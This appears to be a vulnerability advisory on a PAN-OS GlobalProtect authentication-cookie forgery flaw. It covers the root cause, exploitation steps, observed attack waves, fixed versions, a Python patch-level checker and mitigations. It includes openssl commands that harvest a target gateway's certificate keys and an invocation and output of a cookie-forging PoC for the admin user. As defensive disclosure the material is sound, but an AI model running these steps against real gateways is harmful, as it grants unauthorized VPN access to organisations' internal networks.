The vulnerability resides in the GlobalProtect authentication override feature of PAN-OS. When enabled, this feature issues a cookie to authenticated users that serves as a bearer token so they don’t have to re‑enter credentials for subsequent VPN sessions.
Under normal operation, the PAN‑OS gateway receives the cookie, base64‑decodes it, and decrypts the string using a configured private key. The decrypted content is then trusted without any signature verification or cryptographic integrity check – a classic CWE‑565 weakness.
The flaw becomes exploitable when the same certificate is reused for both the HTTPS service (which exposes its public key during the TLS handshake) and the authentication override cookie encryption/decryption. Because the private key is used for decryption but no signature validation occurs after decryption, an attacker who possesses the corresponding public key can forge arbitrary authentication cookies containing any username.
The exploitation process is:
- Retrieve the certificate chain from the target’s GlobalProtect portal/gateway HTTPS service.
- Iterate through each certificate and extract its public key.
- Encrypt a forged authentication cookie with each public key.
- Submit the forged cookies to the `/ssl-vpn/login.esp` endpoint.
- If the appliance’s cookie‑decryption private key matches the public key used to encrypt the cookie, the decrypted content is accepted as valid, granting unauthorized VPN access.
The entire attack is unauthenticated, requires no user interaction, and can be performed in a single HTTP request.
DailyCVE Form:
Platform: Palo Alto PAN-OS
Version: 10.2, 11.1, 11.2, 12.1
Vulnerability: Auth Cookie Forgery
Severity: CVSS 7.8 High
Date: 2026-05-13
Prediction: 2026-06-01 (CISA KEV deadline)
What Undercode Says: Analytics
```bash
# Retrieve the full certificate chain presented by the target GlobalProtect gateway
# (piping straight into `openssl x509` would keep only the first certificate)
openssl s_client -connect vpn.target.com:443 -showcerts </dev/null 2>/dev/null \
  | sed -n '/BEGIN CERT/,/END CERT/p' > gateway_chain.pem

# Split the chain into one PEM file per certificate, then extract each public key
awk '/BEGIN CERT/{n++} {print > ("cert_" n ".pem")}' gateway_chain.pem
for cert in cert_*.pem; do
  openssl x509 -in "$cert" -pubkey -noout \
    > "pubkey_$(openssl x509 -in "$cert" -noout -hash).pem"
done

# Forge an authentication override cookie using the public key (using a known PoC script)
python3 forge_cookie.py --target vpn.target.com --port 443 --user admin --verbose
```
Observed attacker infrastructure
- Wave 1 (May 17‑18, 2026): Vultr‑hosted IPs
- Wave 2 (May 21, 2026): Dromatics Systems IPs
Both waves used a consistent spoofed MAC address and targeted the local administrator account with forged cookies. In the second wave, attackers successfully obtained VPN IP assignments and gained direct internal network access.
Exploit
No authentication is required. The attacker only needs:
1. A reachable GlobalProtect portal/gateway
2. The “authentication override cookies” feature enabled
3. The cookie‑encryption certificate reused with the HTTPS service
The public key is obtained from the server’s own TLS certificate chain. The attacker then crafts a cookie containing arbitrary user data (e.g., user=admin), encrypts it with that public key, and submits it to the gateway. Because the gateway uses the corresponding private key to decrypt and trusts the result without any signature check, the forged cookie is accepted.
Example PoC command (from Rapid7 researcher)
```
python forge_cookie.py --target 192.168.86.99 --user admin
[] Retrieving certificate chain from 192.168.86.99:443 ...
Found 2 certificate(s) in chain:
[bash] CN=192.168.86.99 (RSA 2048 bits, CA=False)
[bash] CN=GP-Lab-CA (RSA 2048 bits, CA=True)
[] Forging cookie for user 'admin', testing each key
Trying [bash] CN=192.168.86.99
[-] Failure - Gateway did not accept the forged cookie
Trying [bash] CN=GP-Lab-CA
[+] Success - Gateway accepted the forged cookie
```
The script then outputs the forged cookie value that can be used in subsequent VPN requests.
Protection
Immediate remediation (patch)
Apply any of the following fixed PAN‑OS versions:
| Branch | Fixed version |
|---|---|
| 12.1 | 12.1.4‑h6 / 12.1.7 |
| 11.2 | 11.2.4‑h17 / 11.2.7‑h14 / 11.2.10‑h7 / 11.2.12 |
| 11.1 | 11.1.4‑h33 / 11.1.6‑h32 / 11.1.7‑h6 / 11.1.10‑h25 / 11.1.13‑h5 / 11.1.15 |
| 10.2 | 10.2.7‑h34 / 10.2.10‑h36 / 10.2.13‑h21 / 10.2.16‑h7 / 10.2.18‑h6 |
Prisma Access customers should upgrade to 10.2.10‑h36 or 11.2.7‑h13.
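As an added helper that is not part of the advisory or of any Palo Alto Networks tooling, this Python check classifies an installed PAN‑OS version against the fixed releases in the table above. It assumes the usual PAN‑OS advisory semantics: a hotfix entry such as 11.2.7‑h14 fixes only the 11.2.7 maintenance release at that hotfix level or higher, while a plain entry such as 11.2.12 fixes that release and everything later in the branch; confirm against the vendor advisory for your exact release.

```python
import re

# Fixed releases per PAN-OS branch, copied from the advisory table above.
FIXED = {
    "12.1": ["12.1.4-h6", "12.1.7"],
    "11.2": ["11.2.4-h17", "11.2.7-h14", "11.2.10-h7", "11.2.12"],
    "11.1": ["11.1.4-h33", "11.1.6-h32", "11.1.7-h6", "11.1.10-h25", "11.1.13-h5", "11.1.15"],
    "10.2": ["10.2.7-h34", "10.2.10-h36", "10.2.13-h21", "10.2.16-h7", "10.2.18-h6"],
}

_VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")

def parse(version):
    """Split 'major.minor.patch[-hN]' into (major, minor, patch, hotfix); hotfix is 0 if absent.
    The non-breaking hyphen some advisories use before 'h' is normalised first."""
    m = _VERSION.match(version.strip().replace("\u2011", "-"))
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, patch, hotfix = m.groups()
    return int(major), int(minor), int(patch), int(hotfix or 0)

def assess(version):
    """Return 'fixed', 'vulnerable', or 'not listed' (branch absent from the table)."""
    major, minor, patch, hotfix = parse(version)
    branch = f"{major}.{minor}"
    if branch not in FIXED:
        return "not listed"
    for fixed in FIXED[branch]:
        _, _, fpatch, fhotfix = parse(fixed)
        if fhotfix == 0:
            # Plain release: that maintenance release and all later ones carry the fix.
            if patch >= fpatch:
                return "fixed"
        elif patch == fpatch and hotfix >= fhotfix:
            # Hotfix: only the same maintenance release at or above that hotfix level.
            return "fixed"
    return "vulnerable"

def report(versions):
    """Assess a list of installed versions, e.g. pulled from a fleet inventory."""
    return {v: assess(v) for v in versions}
```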
Temporary mitigations (if patching is impossible)
- Disable authentication override in GlobalProtect portal and gateway configurations
- Generate a new, dedicated certificate for authentication override cookies – do not reuse the certificate with any other service (e.g., HTTPS management interface)
Palo Alto Networks has confirmed that devices without authentication override enabled are not vulnerable.
Impact
- Authentication bypass allowing remote, unauthenticated attackers to establish a VPN connection as any user (including the local administrator)
- Direct internal network access once the gateway assigns a VPN IP address to the forged session
- Observed exploitation in two waves (mid‑May 2026) targeting multiple organisations; CISA added CVE‑2026‑0257 to its Known Exploited Vulnerabilities catalog with a patch deadline of June 1, 2026
- No lateral movement was detected in the analysed incidents, but the vulnerability provides a foothold from which further attacks can be launched
CVSS v4.0 score: 7.8 (High) – but treat as critical on edge‑facing VPN appliances.
Sources:
Reported By: www.cve.org